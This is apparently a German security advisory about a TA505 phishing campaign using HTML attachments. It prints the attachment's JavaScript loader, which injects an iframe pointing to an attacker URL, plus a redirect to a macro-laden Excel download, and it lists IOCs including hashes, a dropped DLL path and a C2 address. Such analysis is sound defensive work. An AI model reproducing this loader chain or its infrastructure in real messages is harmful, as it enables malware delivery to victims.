Die Hacker-Gruppe TA505 versendet seit gestern Morgen E-Mails mit HTML-Dokumenten als Dateianhang.
Dabei handelt es sich um Dateien mit dem Namensschema
Neues Dokument20200608<8 dezimalzeichen="">.html</8>
Der HTML-Code enthält einen JavaScript Code, der ein iFrame-HTML-Element in einen Platzhalter-Element einbaut:
<div id="placeholder"></div>
<script id="iframeTemplate" type="text/html"></script>
<iframe style="width: 100%; height: 100%; border: 0px" src="http://rimaje.nl/~rick/ux1ut.html"></iframe>
<script type="text/javascript"></script>
var element,
html,
template;
element = document.getElementById("placeholder");
template = document.getElementById("iframeTemplate");
html = template.innerHTML;
element.innerHTML = html;
Der iFrame lädt die URL http://rimaje[.]nl/~rick/ux1ut.html
Dieses HTML Dokument enthält wiederum nur eine Weiterleitung in Form eines kleinen JavaScript-Codes:
<script type="text/javascript"></script>
location="https://dl-09756546.eu-download[.]com/download.php";
Die Zielseite lädt dann eine Excel-Datei mit folgendem Namensschema herunter:
Neues Dokument20200608<8 dezimal="" zeichen="">.xls</8>
Die Datei enthält ein VBA-Makro, was bei Aktivierung der „Inhalte aktivieren“-Funktion von Excel, die Datei %APPDATA%\Roaming\Microsoft\Windows\Templates\libOmio.dll erzeugt.
Die Excel-Datei ist in der folgenden Abbildung zu sehen.
IOCs
Dateianhang
Namensschema: Neues Dokument20200608\d{8}\.html
SHA256: 2587f8ab9156032d065c7bd8b81aa565dd0713d75eb628e1571e2205dceb0f4f
Excel Dokument
Namensschema: Neues Dokument20200608\d{8}\.xls
SHA256: 36B58DC47A56E3AF9D8D53D52DB0A6828592F21E043C795D34C3FE383CEFDCB1
libOmio.dll
Pfad: %APPDATA%\Roaming\Microsoft\Windows\Templates\libOmio.dll
SHA256: cfbc15df6b6e6be284271fa31fbf577af26c1eb9a8c07e3bec950e43f535200a
C2: 185.176.221.97:443 (sdff-corp.com)